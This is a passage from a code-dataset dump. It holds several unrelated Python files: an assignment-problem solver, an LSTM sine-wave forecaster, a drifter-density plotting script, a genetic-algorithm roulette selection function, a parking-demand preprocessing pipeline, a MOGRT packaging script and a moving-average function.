assignment_costs = feasible_sol_cost(sol, cost_matrix)\n # print(f\"Feasible Solution {i+1}/{len(feasible_sols)}: \", sol, \"Assignment Costs: \", assignment_costs, \"Total Cost: \", cost)\n if cost < min_cost:\n min_cost = cost\n best_sol = sol\n best_assignment_costs = assignment_costs\n\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n print(\"\\nBest Solution: \")\n\n print(f\"\\nTotal cost = {min_cost}\\n\")\n\n num_jobs = len(best_sol)\n for i in range(0, num_jobs):\n cur_job = i\n next_job = best_sol[i][1]\n print(\n f\"Job {cur_job} precedes job {next_job}.\"\n + f\" Cost = {best_assignment_costs[i]}\"\n )\n\n print(\"\\nSolve Time = \", format(elapsed_time, '.6f'), \"seconds\")\n\n else:\n print(\"No feasible solutions. Assignment is not possible.\")\n\n return best_sol, best_assignment_costs, min_cost\n\n\ndef generate_feasible_solutions(cost_matrix):\n\n print(\"Generating feasible solutions: \")\n\n cost_matrix = cost_matrix.tolist()\n\n n = len(cost_matrix)\n\n feasible_solutions = []\n\n partial_solutions = [{\"path\": [(0, i)], \"used_cols\": {i}, \"cur_row\": 0} for i in range(1, n)]\n while partial_solutions:\n # print(partial_solutions)\n\n curr_path_object = partial_solutions.pop(0)\n curr_path = curr_path_object[\"path\"]\n next_row = curr_path_object[\"cur_row\"] + 1\n\n used_cols = curr_path_object[\"used_cols\"]\n next_row_feasible_cols = {index for index, cost in enumerate(\n cost_matrix[next_row]) if cost != \"NA\" and index != next_row} - used_cols\n for col in next_row_feasible_cols:\n updated_path = curr_path.copy()\n updated_path.append((next_row, col))\n if len(updated_path) == n:\n feasible_solutions.append(updated_path)\n # print(\"feasible soloutions\", feasible_solutions)\n else:\n new_used_cols = used_cols.union({col})\n cur_row = next_row\n updated_path_object = {\"path\": updated_path, \"used_cols\": new_used_cols, \"cur_row\": cur_row}\n partial_solutions.append(updated_path_object)\n\n print(f\"There are {len(feasible_solutions)} feasible solutions \\n\")\n\n return feasible_solutions\n\n\ndef feasible_sol_cost(sol, cost_matrix):\n\n # cost matrix is a 2d numpy array, #TO DO - add Typing\n\n row_indices = [edge[0] for edge in sol]\n\n col_indices = [edge[1] for edge in sol]\n\n assignment_costs = cost_matrix[row_indices, col_indices]\n\n cost = assignment_costs.sum()\n\n return cost, assignment_costs.tolist()\n\n\nif __name__ == \"__main__\":\n\n # n=3\n\n # cost_matrix = np.array([[i*j for i in range(4)] for j in range(4)] )\n\n # # feasible_sols = generate_feasible_solutions(cost_matrix)\n\n # # first_sol = feasible_sols[0]\n\n # # print(\"Sol: \", first_sol)\n # # cost = feasible_sol_cost(first_sol, cost_matrix)\n # # print(\"Sol Cost\": cost)\n\n # best_sol, best_assignment_costs, min_cost = brute_force_AP_solver(cost_matrix)\n\n instance_file_path = r\"C:\\Users\\Shmuli\\Desktop\\Optimization\\CGLSP\\problem_instances\\CGLSP_instances\\data\\cgl_17.txt\"\n cost_matrix = get_CGLSP_instance_cost_matrix(instance_file_path)\n print(cost_matrix)\n\n best_sol, min_cost = brute_force_AP_solver(cost_matrix)\n\n print(\"Best Sol: \", best_sol, \"Min Cost: \", min_cost)\n","repo_name":"shmulib/CGLSP","sub_path":"src/MAP_other/MAP_brute_force_solver.py","file_name":"MAP_brute_force_solver.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3201110208","text":"import torch\nimport numpy as np\n\nfrom reg.nn import LSTMRegressor\n\n\nif __name__ == '__main__':\n\n np.random.seed(1337)\n torch.manual_seed(1337)\n\n import matplotlib.pyplot as plt\n\n T, L, N = 20, 250, 25\n\n input_size = 1\n target_size = 1\n\n x = np.empty((N, L), 'int64')\n x[:] = np.array(range(L)) + np.random.randint(-4 * T, 4 * T, N).reshape(N, 1)\n data = np.sin(x / 1.0 / T).astype('float64')\n\n input = data[:, :-1].reshape(N, -1, input_size)\n target = data[:, 1:].reshape(N, -1, target_size)\n\n lstm = LSTMRegressor(input_size=input_size,\n target_size=target_size,\n hidden_size=24,\n nb_layers=2)\n\n lstm.fit(target, input, nb_epochs=100, preprocess=True)\n\n horizon, buffer = 200, 35\n yhat = lstm.forcast(input[:, :buffer, :], horizon=horizon)\n\n plt.figure()\n plt.plot(target[5, buffer:buffer + horizon + 1, :], label='target')\n plt.plot(yhat[5, ...], label='prediction')\n plt.legend()\n plt.show()\n","repo_name":"pnickl/reg","sub_path":"examples/lstm/lstm_sine.py","file_name":"lstm_sine.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12656861099","text":"import load_data\nimport matplotlib.pyplot as plt\nimport toolbox as tb\nimport pandas as pd\nimport numpy as np\nfrom file_names import *\nimport plotter\nimport cartopy.crs as ccrs\ncrs = ccrs.PlateCarree()\n\nds = load_data.load_subset(type_death=1)\nds_gps = load_data.load_subset(location_type='gps', ds=ds)\ndf = pd.read_csv(f'data/{file_name_1}.csv', parse_dates=['time_start', 'time_end'])\n\n#%%\nprint(f'Number of trajectories with death type 1: {len(ds.ids)}')\nprint(f'Number of trajectories with death type 1 and gps: {len(ds_gps.ids)}')\n\nylim= [-88, 88]\nxlim=None\nlonlat_box_size = 5\n\n\nX, Y, density_grid_original = tb.get_density_grid(ds.end_lat.values, ds.end_lon.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)\ndensity_grid_gps = tb.get_density_grid(ds_gps.end_lat.values, ds_gps.end_lon.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)[2]\ndensity_grid_own = tb.get_density_grid(df.latitude_end.values, df.longitude_end.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)[2]\n\n\n# %%\nfig, axs = plt.subplots(3, 1, figsize=(14, 9), dpi=300)\nfor ax in axs.flat:\n # Plot your density map\n\n # Remove the extra borders\n ax.spines['top'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n\n\nplotter.plot_global_density(X, Y, density_grid_original, title='death type 1', ax=fig.add_subplot(3,1,1, projection=crs))\nplotter.plot_global_density(X, Y, density_grid_gps, title='death type 1 gps', ax=fig.add_subplot(3,1,2, projection=crs))\nplotter.plot_global_density(X, Y, density_grid_own, title='SDDA', ax=fig.add_subplot(3,1,3, projection=crs))\n\nplt.savefig(f'figures/compare_end_coords_{lonlat_box_size}.png')\n\nplt.show()","repo_name":"mfmopdenkamp/PlasticBeaching","sub_path":"compare_end_coords.py","file_name":"compare_end_coords.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"24381866319","text":"from typing import Callable\n\nimport numpy as np\nfrom sklearn.preprocessing import normalize\n\n\ndef roulette_selection(\n population: np.array, objective: Callable[[np.array], float]\n) -> np.array:\n \"\"\"\n Select mating pool using Roulette selection\n\n :param population: array of individual specimen\n :param objective: objective function, must take in array and return fitness value\n\n :return: array of selected mating pairs with shape (POPULATION_SIZE, SPECIMEN_DIM, 2)\n \"\"\"\n fitness = np.apply_along_axis(objective, 1, population)\n probabilities = np.cumsum(normalize(fitness.reshape(1, -1), norm=\"l1\"))\n\n selected = np.vectorize(lambda value: len(np.where(value > probabilities)[0]))(np.random.rand(len(population) * 2))\n return population[selected].reshape(population.shape + (2, ))\n","repo_name":"kzajac97/evolutionary-algorithms","sub_path":"src/operators/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"44086646171","text":"# -*- coding: utf-8 -*-\n\n# ======================================================================================================================\n#\n#\n#\n# 1. Preprocessing 1\n#\n#\n#\n# ======================================================================================================================\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 0. Set Environments\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [Import modules]\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport pickle\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.decomposition import NMF\n\n\n\n# --------------------------------------->>> [Set directory]\n\n\n# ----- Set output path\n\nout_path = 'data'\n\n# --------------------------------------->>> [Set options]\n\n# ----- Pandas max column showing options\n\npd.set_option('max.column', None)\n\n# ----- Matplotlib axis offset 설정\n\nmpl.rcParams['axes.formatter.useoffset'] = False\n\n# ----- 한글 폰트 설정\n\nplt.rcParams['font.family'] = 'AppleGothic'\nplt.rcParams['axes.unicode_minus'] = False\n\n\n\n# --------------------------------------->>> [Data loading]\n\n# ----- 데이터 로딩\n\nraw_train_df = pd.read_csv('data/235745_parking_data/train.csv')\nraw_test_df = pd.read_csv('data/235745_parking_data/test.csv')\nraw_age_gender_info = pd.read_csv('data/235745_parking_data/age_gender_info.csv')\nsample_submission = pd.read_csv('data/235745_parking_data/sample_submission.csv')\n\nraw_train_df.rename({'도보 10분거리 내 지하철역 수(환승노선 수 반영)' : 'subway',\n '도보 10분거리 내 버스정류장 수' : 'bus'}, axis = 1, inplace= True)\n\nraw_test_df.rename({'도보 10분거리 내 지하철역 수(환승노선 수 반영)' : 'subway',\n '도보 10분거리 내 버스정류장 수' : 'bus'}, axis = 1, inplace = True)\n\n# ----- 데이터 사전 전처리\n\ndelete_code_train = ['C1095',\n 'C2051',\n 'C1218',\n 'C1894',\n 'C2483',\n 'C1502',\n 'C1988',\n 'C2085',\n 'C1397',\n 'C2431',\n 'C1649',\n 'C1036']\n\ndelete_code_test = ['C2335',\n 'C1327',\n 'C2675']\n\nraw_train_df = raw_train_df.loc[~raw_train_df['단지코드'].isin(delete_code_train), :]\nraw_test_df = raw_test_df.loc[~raw_test_df['단지코드'].isin(delete_code_test), :]\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 1. 단지별 요약 통계량 만들기\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [이상값 처리]\n\n# ----- \"-\" NAN 처리\n\nraw_train_df = raw_train_df.replace({'-' : np.nan})\nraw_train_df['임대보증금'] = raw_train_df['임대보증금'].astype(float)\nraw_train_df['임대료'] = raw_train_df['임대료'].astype(float)\n\nraw_test_df = raw_test_df.replace({'-' : np.nan})\nraw_test_df['임대보증금'] = raw_test_df['임대보증금'].astype(float)\nraw_test_df['임대료'] = raw_test_df['임대료'].astype(float)\n\n# ----- 전용면적 15 미만 15로, 100초과 100으로\n\ndef tmp_fn(x):\n\n if x < 15:\n\n return 15\n\n if x >= 15 and x < 105:\n\n return x\n\n if x >= 105:\n\n return 100\n\nraw_train_df['전용면적'] = raw_train_df['전용면적'].map(tmp_fn)\nraw_test_df['전용면적'] = raw_test_df['전용면적'].map(tmp_fn)\n\n\n# --------------------------------------->>> [요약 통계량 만들기, train set]\n\n\ncode_list_uq = raw_train_df['단지코드'].unique().tolist()\n\nneed_columns = ['단지코드', '총세대수', '임대건물구분', '지역', '공급유형'] +\\\n [f'면적_{x}_세대수' for x in np.arange(15, 105, 5)] +\\\n ['공가수', '자격유형', 'subway', 'bus', '단지내주차면수', '등록차량수']\n\nbase_frame = pd.DataFrame({},\n columns = need_columns,\n index = [0])\n\ntrain_df_list = []\n\nfor code in code_list_uq:\n\n sub_df = raw_train_df.loc[raw_train_df['단지코드'] == code, :].copy()\n sub_df['전용면적'] = (sub_df['전용면적'] // 5) * 5\n\n sum_df = base_frame.copy()\n\n sum_df['단지코드'] = sub_df['단지코드'].unique()[0]\n sum_df['총세대수'] = sub_df['총세대수'].unique()[0]\n sum_df['임대건물구분'] = '+'.join(np.sort(sub_df['임대건물구분'].unique()).tolist())\n sum_df['지역'] = sub_df['지역'].unique()[0]\n sum_df['공급유형'] = '+'.join(np.sort(sub_df['공급유형'].unique()).tolist())\n sum_df['세대수합'] = sub_df['전용면적별세대수'].sum()\n sum_df['subway'] = sub_df['subway'].unique()[0]\n sum_df['bus'] = sub_df['bus'].unique()[0]\n sum_df['단지내주차면수'] = sub_df['단지내주차면수'].unique()[0]\n sum_df['등록차량수'] = sub_df['등록차량수'].unique()[0]\n sum_df['공가수'] = sub_df['공가수'].unique()[0]\n sum_df['자격유형'] = '+'.join(np.sort(sub_df['자격유형'].unique()).tolist())\n\n for ii in np.arange(15, 105, 5):\n\n if ii in sub_df['전용면적'].values:\n\n sum_df[f'면적_{ii}_세대수'] = sub_df.loc[sub_df['전용면적'] == ii, '전용면적별세대수'].sum()\n\n else:\n\n sum_df[f'면적_{ii}_세대수'] = 0\n\n sum_df['임대보증금_mean'] = sub_df['임대보증금'].mean()\n sum_df['임대보증금_min'] = sub_df['임대보증금'].min()\n sum_df['임대보증금_max'] = sub_df['임대보증금'].max()\n\n sum_df['임대료_mean'] = sub_df['임대료'].mean()\n sum_df['임대료_min'] = sub_df['임대료'].min()\n sum_df['임대료_max'] = sub_df['임대료'].max()\n\n train_df_list.append(sum_df)\n\ntrain_df = pd.concat(train_df_list)\n\ntrain_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [요약 통계량 만들기, test set]\n\n\ncode_list_uq = raw_test_df['단지코드'].unique().tolist()\n\nneed_columns = ['단지코드', '총세대수', '임대건물구분', '지역', '공급유형'] +\\\n [f'면적_{x}_세대수' for x in np.arange(15, 105, 5)] +\\\n ['공가수', '자격유형', 'subway', 'bus', '단지내주차면수']\n\nbase_frame = pd.DataFrame({},\n columns = need_columns,\n index = [0])\n\ntest_df_list = []\n\nfor code in code_list_uq:\n\n sub_df = raw_test_df.loc[raw_test_df['단지코드'] == code, :].copy()\n sub_df['전용면적'] = (sub_df['전용면적'] // 5) * 5\n\n sum_df = base_frame.copy()\n\n sum_df['단지코드'] = sub_df['단지코드'].unique()[0]\n sum_df['총세대수'] = sub_df['총세대수'].unique()[0]\n sum_df['임대건물구분'] = '+'.join(np.sort(sub_df['임대건물구분'].unique()).tolist())\n sum_df['지역'] = sub_df['지역'].unique()[0]\n sum_df['공급유형'] = '+'.join(np.sort(sub_df['공급유형'].unique()).tolist())\n sum_df['세대수합'] = sub_df['전용면적별세대수'].sum()\n sum_df['subway'] = sub_df['subway'].unique()[0]\n sum_df['bus'] = sub_df['bus'].unique()[0]\n sum_df['단지내주차면수'] = sub_df['단지내주차면수'].unique()[0]\n sum_df['공가수'] = sub_df['공가수'].unique()[0]\n sum_df['자격유형'] = '+'.join(np.sort(sub_df['자격유형'].dropna().unique()).tolist())\n\n for ii in np.arange(15, 105, 5):\n\n if ii in sub_df['전용면적'].values:\n\n sum_df[f'면적_{ii}_세대수'] = sub_df.loc[sub_df['전용면적'] == ii, '전용면적별세대수'].sum()\n\n else:\n\n sum_df[f'면적_{ii}_세대수'] = 0\n\n sum_df['임대보증금_mean'] = sub_df['임대보증금'].mean()\n sum_df['임대보증금_min'] = sub_df['임대보증금'].min()\n sum_df['임대보증금_max'] = sub_df['임대보증금'].max()\n\n sum_df['임대료_mean'] = sub_df['임대료'].mean()\n sum_df['임대료_min'] = sub_df['임대료'].min()\n sum_df['임대료_max'] = sub_df['임대료'].max()\n\n test_df_list.append(sum_df)\n\ntest_df = pd.concat(test_df_list)\n\ntest_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [공급유형 범주 합치기]\n\nin_test_cate = test_df['공급유형'].unique().tolist()\n\ntrain_df = train_df.loc[train_df['공급유형'].isin(in_test_cate), :]\n\ntrain_df['공급유형_merge'] = train_df['공급유형'].map({'공공임대(50년)' : '기타',\n '공공임대(10년)+공공임대(분납)' : '기타',\n '국민임대+영구임대+행복주택' : '기타',\n '영구임대' : '기타',\n '국민임대' : '국민임대',\n '공공임대(10년)' : '공공임대(10년)',\n '영구임대+임대상가' : '영구임대+임대상가',\n '행복주택' : '행복주택',\n '국민임대+영구임대' : '국민임대+영구임대'})\n\ntest_df['공급유형_merge'] = test_df['공급유형'].map({'공공임대(50년)' : '기타',\n '공공임대(10년)+공공임대(분납)' : '기타',\n '국민임대+영구임대+행복주택' : '기타',\n '영구임대' : '기타',\n '국민임대' : '국민임대',\n '공공임대(10년)' : '공공임대(10년)',\n '영구임대+임대상가' : '영구임대+임대상가',\n '행복주택' : '행복주택',\n '국민임대+영구임대' : '국민임대+영구임대'})\n\n# --------------------------------------->>> [자격유형 범주 합치기]\n\n# ----- Train set\n\nselected_items_list = ['A', 'C+D', 'H', 'J', 'A+E']\n\ntf_result = np.array([False]*train_df.shape[0])\n\nfor item in selected_items_list:\n\n tf_list = train_df['자격유형'].values == item\n\n tf_result = tf_result | tf_list\n\n\ntrain_df['자격유형_merge'] = [train_df['자격유형'].values[ii] if tf_result[ii] else '기타' for ii in range(train_df.shape[0])]\n\n# ----- Test set\n\nselected_items_list = ['A', 'C+D', 'H', 'J', 'A+E']\n\ntf_result = np.array([False]*test_df.shape[0])\n\nfor item in selected_items_list:\n\n tf_list = test_df['자격유형'].values == item\n\n tf_result = tf_result | tf_list\n\n\ntest_df['자격유형_merge'] = [test_df['자격유형'].values[ii] if tf_result[ii] else '기타' for ii in range(test_df.shape[0])]\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 2. Categorical 변수 전처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [train / test set 지역 맞추기]\n\ntrain_df = train_df.loc[~train_df['지역'].isin(['서울특별시']), :]\ntrain_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [지역 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_region'] = ts_df['지역'].map(tr_df.groupby('지역')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_region'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_region'] = test_df['지역'].map(train_df.groupby('지역')['등록차량수'].mean())\n\n\n# --------------------------------------->>> [공급유형 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_supply'] = ts_df['공급유형_merge'].map(tr_df.groupby('공급유형_merge')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_supply'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_supply'] = test_df['공급유형_merge'].map(train_df.groupby('공급유형_merge')['등록차량수'].mean())\n\n# --------------------------------------->>> [자격유형 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_cond'] = ts_df['자격유형_merge'].map(tr_df.groupby('자격유형_merge')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_cond'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_cond'] = test_df['자격유형_merge'].map(train_df.groupby('자격유형_merge')['등록차량수'].mean())\n\n\n\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 3. 면적 관련 변수 전처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [NMF로 latent feature extraction]\n\nsize_df_tr = train_df[[x for x in train_df.columns if '면적_' in x]]\nsize_df_ts = test_df[[x for x in test_df.columns if '면적_' in x]]\nsize_df_total = pd.concat([size_df_tr, size_df_ts])\n\nsize_arr_total = size_df_total.values\n\nnmf = NMF(n_components = 50,\n init = 'random',\n random_state = 0,\n max_iter = 300)\n\nW = nmf.fit_transform(size_arr_total)\n\nW_tr = W[0:size_df_tr.shape[0], :]\nW_ts = W[size_df_tr.shape[0]:, :]\n\nsize_df_train = pd.DataFrame(W_tr,\n columns = [f'size_{x}' for x in range(W_tr.shape[1])])\n\nsize_df_test = pd.DataFrame(W_ts,\n columns = [f'size_{x}' for x in range(W_ts.shape[1])])\n\n\ntrain_df = pd.concat([train_df, size_df_train], axis = 1)\ntest_df = pd.concat([test_df, size_df_test], axis = 1)\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 4. 지역 관련 feature feature extraction\n# ----------------------------------------------------------------------------------------------------------------------\n\n# train_df_onehot = pd.get_dummies(train_df['지역'],\n# prefix = '지역')\n#\n# test_df_onehot = pd.get_dummies(test_df['지역'],\n# prefix = '지역')\n#\n# total_df_onehot = pd.concat([train_df_onehot, test_df_onehot])\n# total_df_onehot.reset_index(drop = True, inplace = True)\n#\n#\n# nmf = NMF(n_components = 50,\n# init = 'random',\n# random_state = 0,\n# max_iter = 300)\n#\n# W = nmf.fit_transform(total_df_onehot.values)\n#\n# W_tr = W[0:train_df_onehot.shape[0], :]\n# W_ts = W[train_df_onehot.shape[0]:, :]\n#\n# region_df_train = pd.DataFrame(W_tr,\n# columns = [f'region_{x}' for x in range(W_tr.shape[1])])\n#\n# region_df_test = pd.DataFrame(W_ts,\n# columns = [f'region_{x}' for x in range(W_ts.shape[1])])\n#\n# train_df = pd.concat([train_df, region_df_train], axis = 1)\n# test_df = pd.concat([test_df, region_df_test], axis = 1)\n#\n# train_df.reset_index(drop = True, inplace = True)\n# test_df.reset_index(drop = True, inplace = True)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 4. 결측치 처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [Subway]\n\ntrain_df['subway'] = train_df['subway'].fillna(0)\ntest_df['subway'] = test_df['subway'].fillna(0)\n\n# --------------------------------------->>> [Bus]\n\nglobal_median = np.nanmedian(np.r_[train_df['bus'].values, test_df['bus'].values])\n\ntrain_df['bus'] = train_df['bus'].fillna(global_median)\n\n# --------------------------------------->>> [임대보증금_mean]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보��금_mean'].values, test_df['임대보증금_mean'].values])\n\ntrain_df['임대보증금_mean'] = train_df['임대보증금_mean'].fillna(global_mean)\ntest_df['임대보증금_mean'] = test_df['임대보증금_mean'].fillna(global_mean)\n\n# --------------------------------------->>> [임대보증금_min]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보증금_min'].values, test_df['임대보증금_min'].values])\n\ntrain_df['임대보증금_min'] = train_df['임대보증금_min'].fillna(global_mean)\ntest_df['임대보증금_min'] = test_df['임대보증금_min'].fillna(global_mean)\n\n# --------------------------------------->>> [임대보증금_max]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보증금_max'].values, test_df['임대보증금_max'].values])\n\ntrain_df['임대보증금_max'] = train_df['임대보증금_max'].fillna(global_mean)\ntest_df['임대보증금_max'] = test_df['임대보증금_max'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_mean]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_mean'].values, test_df['임대료_mean'].values])\n\ntrain_df['임대료_mean'] = train_df['임대료_mean'].fillna(global_mean)\ntest_df['임대료_mean'] = test_df['임대료_mean'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_min]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_min'].values, test_df['임대료_min'].values])\n\ntrain_df['임대료_min'] = train_df['임대료_min'].fillna(global_mean)\ntest_df['임대료_min'] = test_df['임대료_min'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_max]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_max'].values, test_df['임대료_max'].values])\n\ntrain_df['임대료_max'] = train_df['임대료_max'].fillna(global_mean)\ntest_df['임대료_max'] = test_df['임대료_max'].fillna(global_mean)\n\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 5. 해석 가능한 파생 변수 생성\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [임대세대외]\n\ntrain_df['임대세대외'] = train_df['총세대수'] - train_df['세대수합']\ntest_df['임대세대외'] = test_df['총세대수'] - test_df['세대수합']\n\n# --------------------------------------->>> [실세대수]\n\ntrain_df['실세대수'] = train_df['총세대수'] - train_df['공가수']\ntest_df['실세대수'] = test_df['총세대수'] - test_df['공가수']\n\n# --------------------------------------->>> [임대세대 비율]\n\ntrain_df['임대세대비율'] = train_df['세대수합'] / train_df['총세대수']\ntest_df['임대세대비율'] = test_df['세대수합'] / test_df['총세대수']\n\n# --------------------------------------->>> [지하철 / 실세대수]\n\ntrain_df['subway_ratio'] = train_df['subway'] / train_df['실세대수']\ntest_df['subway_ratio'] = test_df['subway'] / test_df['실세대수']\n\n# --------------------------------------->>> [버스정류장 / 실세대수]\n\ntrain_df['bus_ratio'] = train_df['bus'] / train_df['실세대수']\ntest_df['bus_ratio'] = test_df['bus'] / test_df['실세대수']\n\n# --------------------------------------->>> [세대 당 주차면수]\n\ntrain_df['단위주차면수'] = train_df['단지내주차면수'] / train_df['실세대수']\ntest_df['단위주차면수'] = test_df['단지내주차면수'] / test_df['실세대수']\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 6. 인구정보 합치기\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [컬럼명 변경]\n\nraw_age_gender_info.columns = list(map(lambda x : x.replace('(', '_').replace(')', ''),\n raw_age_gender_info.columns))\n\ntrain_df = pd.merge(train_df, raw_age_gender_info,\n on = '지역',\n how = 'left')\n\ntest_df = pd.merge(test_df, raw_age_gender_info,\n on = '지역',\n how = 'left')\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n\npickle.dump(train_df, open('data/train_df_2.sav', 'wb'))\npickle.dump(test_df, open('data/test_df_2.sav', 'wb'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mosyo0505/dacon_parking","sub_path":"code/preprocessing/001.preprocessing_1.py","file_name":"001.preprocessing_1.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35273792076","text":"# mogrt.py\n# v1.0\n# Builds Adobe Stock Mogrt Batches based on my personal file structure\n# workbench.tv\n\nimport os\nimport argparse\nimport textwrap\nimport glob\nimport pathlib\nimport shutil\nimport zipfile\n\n\nparser = argparse.ArgumentParser(\n formatter_class = argparse.RawTextHelpFormatter,\n description = 'Builds Adobe Stock Mogrt Batches based on my personal file structure')\nparser.add_argument('src_dir', help = 'source directory')\nargs = parser.parse_args()\n\nsrc_dir = args.src_dir\n\nname = os.path.basename(src_dir)\n\nmogrt = src_dir + '/' + name + '.mogrt'\nthumb = src_dir + '/Renders/Thumbnail.jpg'\npreview = src_dir + '/Renders/Preview.mp4'\n\nroot = \"/Volumes/Dropbox/Dropbox/Work/Clients/Adobe Stock/_MOGRTS/Batch Delivery\"\ndst = root + '/' + name\ntmp = \"/Volumes/Dropbox/Dropbox/Work/Clients/Adobe Stock/_MOGRTS/Batch Delivery Temp\"\n\n# Build Main folder\nos.mkdir(dst)\n\n# Build stock deliverable\nshutil.copyfile(mogrt, dst + '/' + name + '.mogrt')\nshutil.copyfile(preview, dst + '/' + name + '.mp4')\nshutil.copyfile(thumb, dst + '/Thumbnail.jpg')\n\ndeliverable = pathlib.Path(dst)\ndeliverable_zip = root + '/' + name + '.zip'\n\nwith zipfile.ZipFile(deliverable_zip, 'w') as zip:\n for file in deliverable.rglob('*'):\n file_path = str(file)\n zip.write(file, file_path[len(dst):len(file_path)])\n\nprint('--> Zipped Deliverable')\n\n# Clean Up\nshutil.rmtree(dst)\n\nprint('--> Cleaned up')\n","repo_name":"workbenchtv/mogrt","sub_path":"mogrt.py","file_name":"mogrt.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34297658329","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 4 2019\n\n@author: Nahuel\n\"\"\"\n# la variable veces especifica cada cuantas muestras se quiere hacer el promedio\ndef MediaMovil(vector, veces):\n prom = [];\n k = 0;\n iteraciones = len(vector) - veces + 1;\n for i in range(iteraciones):\n acum = 0;\n for j in range(k,k+veces):\n acum = acum + vector[j];\n prom.append(acum/veces);\n k = k+1;\n print(prom); \n\np1 = [11, 12, 13, 14, 15, 16, 17, 18];\nMediaMovil(p1,5)","repo_name":"Nj747/DSP_code_in_Python","sub_path":"Ejemplo1.py","file_name":"Ejemplo1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33867344411","text":"from typing import List, Dict\n\nidx_to_name: List[str] = []\nremaining_visits: List[int] = [] # 1 for lowercase, LARGEINT for uppercase\ngraph: List[List[int]] = [] # 